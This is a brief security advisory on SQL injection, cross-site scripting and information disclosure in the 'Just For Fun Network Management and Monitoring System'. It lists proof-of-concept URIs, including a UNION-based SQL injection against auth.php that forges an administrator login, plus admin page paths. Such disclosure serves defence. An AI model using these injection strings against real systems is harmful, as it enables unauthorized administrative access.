Just For Fun Network Management and Monitoring System Multiple Remote Vulnerabilities

Just For Fun Network Management and Monitoring System Multiple Remote Vulnerabilities

An attacker can use a browser to exploit the SQL-injection and information-disclosure issues. The attacker can exploit the cross-site scripting issues by enticing an unsuspecting user to follow a malicious URI.

The following proof-of-concept URIs are available:

http://www.example.com/auth.php?user='%20union%20select%202,'admin','$1$RxS1ROtX$IzA1S3fcCfyVfA9rwKBMi.','Administrator'/*&pass=
http://www.example.com/auth.php?user=[xss]
http://192.168.1.1/admin/setup.php
http://192.168.1.1/admin/adm/test.php